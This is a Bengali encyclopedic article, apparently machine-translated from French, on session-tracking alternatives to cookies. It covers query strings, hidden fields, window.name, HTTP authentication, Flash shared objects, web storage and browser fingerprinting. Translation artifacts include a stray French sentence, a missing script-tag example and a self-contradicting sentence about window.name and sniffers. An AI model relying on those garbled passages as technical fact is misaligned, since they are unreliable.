এই উদ্দেশ্যে ব্যবহৃত ক্যোয়ারী স্ট্রিং এবং কুকিজ খুবই মিল, উভয়ই তথ্য নির্বিচারে সার্ভার দ্বারা নির্বাচিত এবং ব্রাউজার দ্বারা ফেরত দেওয়া হয়৷ যাইহোক, কিছু পার্থক্য রয়েছে: যখন একটি ক্যোয়ারী স্ট্রিং সম্বলিত একটি URL পুনরায় ব্যবহার করা হয়, তখন একই তথ্য সার্ভারে পাঠানো হয়। উদাহরণস্বরূপ, যদি একজন ব্যবহারকারীর পছন্দগুলি একটি URL-এর একটি ক্যোয়ারী স্ট্রিং-এ এনকোড করা থাকে এবং ব্যবহারকারী সেই URLটি অন্য ব্যবহারকারীকে ইমেলের মাধ্যমে পাঠায়, সেই ব্যবহারকারীও সেই পছন্দগুলি ব্যবহার করতে সক্ষম হবেন৷
অন্যদিকে, যখন একজন ব্যবহারকারী একই পৃষ্ঠায় দুইবার অ্যাক্সেস করে, তখন কোন গ্যারান্টি নেই যে একই ক্যোয়ারী স্ট্রিং উভয়বার ব্যবহার করা হবে। উদাহরণস্বরূপ, যদি কোনও ব্যবহারকারী প্রথমবার একটি অভ্যন্তরীণ সাইট পৃষ্ঠা থেকে একটি পৃষ্ঠায় অবতরণ করে এবং দ্বিতীয়বার একটি বহিরাগত পৃষ্ঠা থেকে একই পৃষ্ঠায় অবতরণ করে, তবে সাইটের পৃষ্ঠার সাথে সম্পর্কিত ক্যোয়ারী স্ট্রিংটি সাধারণত আলাদা হয়, যখন কুকিগুলি একই থাকে .
কোয়েরি স্ট্রিংগুলির অন্যান্য অসুবিধাগুলি নিরাপত্তার সাথে সম্পর্কিত: ক্যোয়ারী স্ট্রিংগুলিতে একটি সেশন সনাক্ত করে এমন ডেটা রাখা সেশন ফিক্সেশন আক্রমণ, শনাক্তকারী রেফারেন্স আক্রমণ এবং অন্যান্য শোষণকে সক্ষম বা সহজ করে। HTTP কুকি হিসেবে সেশন আইডি পাস করা আরও নিরাপদ।
লুকানো ফর্ম ক্ষেত্র
সেশন ট্র্যাকিংয়ের একটি ফর্ম, ASP.NET দ্বারা ব্যবহৃত, লুকানো ক্ষেত্রগুলির সাথে ওয়েব ফর্মগুলি ব্যবহার করা। এই কৌশলটি তথ্য বহন করার জন্য ইউআরএল ক্যোয়ারী স্ট্রিং ব্যবহারের অনুরূপ এবং একই সুবিধা এবং অসুবিধা রয়েছে; এবং যদি ফর্মটি HTTP GET পদ্ধতিতে প্রসেস করা হয়, ক্ষেত্রগুলি আসলে ব্রাউজারের URL এর অংশ হয়ে যায় যা ফর্ম জমা দেওয়ার সময় এটি পাঠাবে। কিন্তু বেশিরভাগ ফর্ম HTTP POST এর মাধ্যমে প্রক্রিয়া করা হয়, যার কারণে ফর্মের তথ্য, লুকানো ক্ষেত্রগুলি সহ, একটি অতিরিক্ত ইনপুট হিসাবে যোগ করা হয় যা URL বা কুকির অংশ নয়৷
ট্র্যাকিং দৃষ্টিকোণ থেকে এই পদ্ধতির দুটি সুবিধা রয়েছে: প্রথমত, URL-এর পরিবর্তে HTML সোর্স কোড এবং POST ইনপুটে রাখা তথ্য ট্র্যাক করা গড় ব্যবহারকারীকে এই ট্র্যাকিং এড়াতে অনুমতি দেবে; দ্বিতীয়ত, ব্যবহারকারী যখন URL কপি করে তখন সেশনের তথ্য কপি করা হয় না (যেমন পৃষ্ঠাটিকে ডিস্কে সংরক্ষণ করতে বা ইমেলের মাধ্যমে পাঠাতে)।
window.name
সমস্ত সাধারণ ওয়েব ব্রাউজার DOM-এর window.name প্রপার্টি ব্যবহার করে জাভাস্ক্রিপ্টের মাধ্যমে প্রচুর পরিমাণে ডেটা (2MB থেকে 32MB) সংরক্ষণ করতে পারে। এই ডেটা সেশন কুকিজের পরিবর্তে ব্যবহার করা যেতে পারে এবং ডোমেন জুড়েও ব্যবহার করা হয়। ক্লায়েন্ট-সাইড সেশন ভেরিয়েবলের একটি জটিল সেট সঞ্চয় করতে কৌশলটি JSON অবজেক্টের সাথে মিলিত হতে পারে।
খারাপ দিক হল প্রতিটি পৃথক উইন্ডো বা ট্যাবে প্রাথমিকভাবে একটি খালি window.name থাকবে; ট্যাব দ্বারা ব্রাউজ করার সময় (ব্যবহারকারীর দ্বারা খোলা) এর অর্থ হল পৃথকভাবে খোলা ট্যাবগুলির একটি উইন্ডো নাম থাকবে না। অতিরিক্তভাবে window.name বিভিন্ন সাইট জুড়ে দর্শকদের ট্র্যাক করতে ব্যবহার করা যেতে পারে যা একটি গোপনীয়তার সমস্যা তৈরি করতে পারে।
সার্ভারের অ-সম্পৃক্ততার কারণে কিছু ক্ষেত্রে এটি কুকিজের চেয়ে বেশি নিরাপদ হতে পারে, এইভাবে স্নিফার কুকিজের নেটওয়ার্ক আক্রমণের জন্য এটিকে অরক্ষিত করে তোলে। যাইহোক, যদি ডেটা সুরক্ষিত করার জন্য বিশেষ ব্যবস্থা নেওয়া হয়, তবে এটি আরও আক্রমণের জন্য ঝুঁকিপূর্ণ, কারণ একই উইন্ডোতে খোলা অন্যান্য সাইটের মাধ্যমে ডেটা পাওয়া যায়।
HTTP প্রমাণীকরণ
HTTP প্রোটোকলের মধ্যে রয়েছে মৌলিক অ্যাক্সেস প্রমাণীকরণ প্রোটোকল এবং অ্যাক্সেস প্রমাণীকরণ ডাইজেস্ট, যা ব্যবহারকারীর ব্যবহারকারীর নাম এবং পাসওয়ার্ড দিলেই একটি ওয়েব পৃষ্ঠায় অ্যাক্সেসের অনুমতি দেয়। সার্ভার যদি একটি ওয়েব পৃষ্ঠায় অ্যাক্সেস দেওয়ার জন্য একটি শংসাপত্রের অনুরোধ করে, ব্রাউজার ব্যবহারকারীর কাছ থেকে এটির অনুরোধ করে এবং একবার প্রাপ্ত হলে, ব্রাউজার এটি সংরক্ষণ করে এবং পরবর্তী সমস্ত HTTP অনুরোধগুলিতে পাঠায়। এই তথ্য ব্যবহারকারী ট্র্যাক করতে ব্যবহার করা যেতে পারে.
স্থানীয় শেয়ার করা বস্তু
যদি একটি ব্রাউজার অ্যাডোব ফ্ল্যাশ প্লেয়ার প্লাগইন অন্তর্ভুক্ত করে, স্থানীয় শেয়ার করা বস্তু কুকিজ হিসাবে একই উদ্দেশ্যে ব্যবহার করা যেতে পারে। তারা ওয়েব ডেভেলপারদের জন্য একটি আকর্ষণীয় পছন্দ হতে পারে কারণ:
- একটি স্থানীয় ভাগ করা বস্তুর ডিফল্ট আকার সীমা হল 100 KB;
- নিরাপত্তা চেক ব্যবহারকারী কুকি চেক থেকে পৃথক (তাই স্থানীয় শেয়ার করা বস্তুর অনুমতি দেওয়া যেতে পারে যখন কুকি না হয়)।
এই শেষ বিন্দু, যা Adobe এর স্থানীয় শেয়ার করা বস্তুর থেকে কুকি ব্যবস্থাপনা নীতিকে আলাদা করে প্রশ্ন উত্থাপন করে তার গোপনীয়তা সেটিংস ব্যবহারকারীর দ্বারা পরিচালনার বিষয়ে: তাকে অবশ্যই সচেতন হতে হবে যে তার কুকিজ পরিচালনা স্থানীয় ভাগ করা বস্তুর পরিচালনার উপর কোন প্রভাব ফেলবে না এবং এর বিপরীতে।
এই সিস্টেমের আরেকটি সমালোচনা হল যে এটি শুধুমাত্র Adobe Flash Player প্লাগইনের মাধ্যমে ব্যবহার করা যেতে পারে যা মালিকানাধীন এবং ওয়েব স্ট্যান্ডার্ড নয়।
ক্লায়েন্ট-সাইড অধ্যবসায়
কিছু ওয়েব ব্রাউজার একটি স্ক্রিপ্ট-ভিত্তিক অধ্যবসায় প্রক্রিয়া সমর্থন করে, যা পরবর্তীতে ব্যবহারের জন্য পৃষ্ঠাটিকে স্থানীয়ভাবে তথ্য সংরক্ষণ করতে দেয়। ইন্টারনেট এক্সপ্লোরার, উদাহরণস্বরূপ, ব্রাউজারের ইতিহাসে, বুকমার্কগুলিতে, XML-এ সংরক্ষিত একটি বিন্যাসে, বা সরাসরি ডিস্কে সংরক্ষিত ওয়েব পৃষ্ঠার সাথে অবিরাম তথ্য সমর্থন করে। Microsoft Internet Explorer 5-এর জন্য, DHTML আচরণের মাধ্যমে একটি ব্যবহারকারী-ডেটা পদ্ধতি উপলব্ধ রয়েছে।
W3C HTML 5-এ ক্লায়েন্ট-সাইড ডেটা স্টোরেজের জন্য একটি নতুন জাভাস্ক্রিপ্ট এপিআই চালু করেছে যাকে ওয়েব স্টোরেজ বলা হয় এবং স্থায়ীভাবে কুকিজ প্রতিস্থাপনের লক্ষ্য ছিল। এটি কুকিজের অনুরূপ কিন্তু ব্যাপকভাবে উন্নত ক্ষমতা সহ এবং HTTP অনুরোধের শিরোনামে তথ্য সংরক্ষণ না করে। এপিআই দুই ধরনের ওয়েব স্টোরেজের অনুমতি দেয়: লোকাল স্টোরেজ এবং সেশন স্টোরেজ, স্থায়ী কুকিজ এবং সেশন কুকিজের মতো (সেশন কুকির মেয়াদ ব্যতীত যখন ব্রাউজার বন্ধ থাকে তখন সেশন স্টোরেজ ট্যাব বন্ধ হলে মেয়াদ শেষ হয়ে যায়), যথাক্রমে। ওয়েব স্টোরেজ Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 এবং Opera 10.50 দ্বারা সমর্থিত।
একটি ভিন্ন প্রক্রিয়া সাধারণত ওয়েব পেজে জাভাস্ক্রিপ্ট প্রোগ্রাম ব্যবহার করে ব্রাউজার ক্যাশিং (রিফ্রেশের পরিবর্তে মেমরিতে) নির্ভর করে।
উদাহরণস্বরূপ, একটি পৃষ্ঠায় ট্যাগ থাকতে পারে . La première fois que la page se charge, le programme exemple.js est aussi chargé.
এই মুহুর্তে, প্রোগ্রামটি ক্যাশে মেমরিতে থাকে এবং পরিদর্শন করা পৃষ্ঠাটি দ্বিতীয়বার পুনরায় লোড হয় না। ফলস্বরূপ, যদি প্রোগ্রামটিতে একটি গ্লোবাল ভেরিয়েবল থাকে (উদাহরণস্বরূপ var id = 3243242;), এই শনাক্তকারীটি বৈধ থাকে এবং পৃষ্ঠাটি আবার লোড হয়ে গেলে বা একবার প্রোগ্রামের সাথে লিঙ্ক করা একটি পৃষ্ঠা লোড হয়ে গেলে অন্যান্য জাভাস্ক্রিপ্ট কোড দ্বারা শোষণ করা যেতে পারে।
এই পদ্ধতির প্রধান অসুবিধা হল জাভাস্ক্রিপ্ট গ্লোবাল ভেরিয়েবলটি অবশ্যই স্ট্যাটিক হতে হবে, অর্থাৎ এটি কুকির মত পরিবর্তন বা মুছে ফেলা যাবে না।
ওয়েব ব্রাউজার ফিঙ্গারপ্রিন্ট
ব্রাউজার ফিঙ্গারপ্রিন্ট হল শনাক্তকরণের উদ্দেশ্যে ব্রাউজারের কনফিগারেশন সেটিংস সম্পর্কে সংগৃহীত তথ্য। এই আঙ্গুলের ছাপগুলি সম্পূর্ণ বা আংশিকভাবে ইন্টারনেট ব্যবহারকারী বা একটি ডিভাইস সনাক্ত করতে ব্যবহার করা যেতে পারে এমনকি যখন কুকিজ নিষ্ক্রিয় থাকে।
বেসিক ওয়েব ব্রাউজার কনফিগারেশন তথ্য দীর্ঘকাল ধরে ওয়েবসাইট শ্রোতা পরিষেবা দ্বারা সংগ্রহ করা হয়েছে সঠিকভাবে মানুষের ওয়েব ট্র্যাফিক পরিমাপ করা এবং বিভিন্ন ধরনের ক্লিক জালিয়াতি সনাক্ত করার উদ্দেশ্যে। ক্লায়েন্ট-সাইড স্ক্রিপ্টিং ভাষার সাহায্যে, অনেক বেশি সঠিক তথ্য সংগ্রহ করা হয় এখন সম্ভব.
এই তথ্যটিকে একটি বিট স্ট্রিং-এ রূপান্তর করলে একটি ডিভাইস ফিঙ্গারপ্রিন্ট তৈরি হয়। 2010 সালে, ইলেকট্রনিক ফ্রন্টিয়ার ফাউন্ডেশন (EFF) একটি ব্রাউজারের ফিঙ্গারপ্রিন্টের এনট্রপি পরিমাপ করেছে কমপক্ষে 18,1 বিট, এবং এটি ক্যানভাস ফিঙ্গারপ্রিন্টিংয়ের অগ্রগতির আগে সেই এনট্রপিতে 5,7 বিট যোগ করেছিল।
সংক্ষেপে কুকিজ
কুকি হল ছোট টেক্সট ফাইল যা ওয়েব ব্রাউজার দ্বারা ওয়েবসাইট ভিজিটরের হার্ড ড্রাইভে সংরক্ষিত থাকে এবং যেগুলি ভিজিটর বা সাইটের মাধ্যমে তাদের যাত্রা সম্পর্কে তথ্য রেকর্ড করতে (অন্যান্য জিনিসগুলির মধ্যে) ব্যবহার করা হয়। ওয়েবমাস্টার এইভাবে একজন ভিজিটরের অভ্যাস চিনতে পারে এবং প্রতিটি ভিজিটরের জন্য তার সাইটের উপস্থাপনা ব্যক্তিগতকৃত করতে পারে; কুকিজ তখন মনে রাখা সম্ভব করে যে কতগুলি নিবন্ধ হোম পেজে প্রদর্শন করতে হবে বা এমনকি কোনও প্রাইভেট পার্টির জন্য লগইন শংসাপত্রগুলি ধরে রাখতে হবে: দর্শক যখন সাইটে ফিরে আসে, তখন তার জন্য তার নাম এবং পাসওয়ার্ড টাইপ করার আর প্রয়োজন হয় না স্বীকৃত হবে, যেহেতু সেগুলি কুকিতে স্বয়ংক্রিয়ভাবে পড়া হয়।
একটি কুকির একটি সীমিত আয়ু থাকে, সাইট ডিজাইনার দ্বারা সেট করা হয়। তারা সাইটের অধিবেশন শেষে মেয়াদ শেষ করতে পারে, যা ব্রাউজার বন্ধ করার সাথে সম্পর্কিত। কুকিজ দর্শকদের জীবনকে সহজ করতে এবং তাদের আরও প্রাসঙ্গিক তথ্য দিয়ে উপস্থাপন করতে ব্যাপকভাবে ব্যবহৃত হয়। কিন্তু বিশেষ কৌশলগুলি বিভিন্ন সাইটে একজন ভিজিটরকে অনুসরণ করা সম্ভব করে এবং এইভাবে তার অভ্যাস সম্পর্কে খুব বিস্তৃত তথ্য সংগ্রহ এবং ক্রস-চেক করা সম্ভব করে। এই পদ্ধতিটি কুকিজের ব্যবহারকে একটি নজরদারি কৌশল হিসাবে একটি খ্যাতি দিয়েছে যা দর্শকদের গোপনীয়তা লঙ্ঘন করে, যা দুর্ভাগ্যবশত অ-প্রযুক্তিগত কারণে বা ব্যবহারকারীর প্রত্যাশার প্রতি শ্রদ্ধাশীল না হওয়ার জন্য ব্যবহারের অনেক ক্ষেত্রে বাস্তবতার সাথে মিলে যায়।
এই বৈধ ভয়ের প্রতিক্রিয়া হিসাবে, HTML 5 ক্লায়েন্ট-সাইড ডেটা স্টোরেজের জন্য ওয়েব স্টোরেজ নামে একটি নতুন জাভাস্ক্রিপ্ট API প্রবর্তন করেছে, যা অনেক বেশি নিরাপদ এবং আরও বেশি ক্ষমতা সহ, যার লক্ষ্য কুকিজ প্রতিস্থাপন করা।
কুকিজ সঞ্চয়স্থান
কিছু ব্রাউজারে, একটি কুকি সহজেই সম্পাদনাযোগ্য, নোটপ্যাডের মতো একটি সাধারণ পাঠ্য সম্পাদকই এর মানগুলি ম্যানুয়ালি পরিবর্তন করার জন্য যথেষ্ট।
ব্রাউজারের উপর নির্ভর করে কুকিগুলি আলাদাভাবে সংরক্ষণ করা হয়:
- মাইক্রোসফ্ট ইন্টারনেট এক্সপ্লোরার প্রতিটি কুকি একটি ভিন্ন ফাইলে সংরক্ষণ করে;
- Mozilla Firefox একটি ফাইলে এর সমস্ত কুকি সংরক্ষণ করে;
- Opera একটি ফাইলে এর সমস্ত কুকি সংরক্ষণ করে এবং সেগুলিকে এনক্রিপ্ট করে (সফ্টওয়্যার বিকল্পগুলি ব্যতীত তাদের পরিবর্তন করা অসম্ভব);
- আপেল সাফারি একটি একক .plist এক্সটেনশন ফাইলে এর সমস্ত কুকি সংরক্ষণ করে। পরিবর্তন সম্ভব কিন্তু খুব সহজ নয়, যদি না আপনি সফ্টওয়্যার বিকল্পগুলির মাধ্যমে যান।
সমর্থন করার জন্য ব্রাউজার প্রয়োজন অন্তত :
- 300 একযোগে কুকিজ;
- কুকি প্রতি 4 o;
- প্রতি হোস্ট বা ডোমেনে 20টি কুকি।
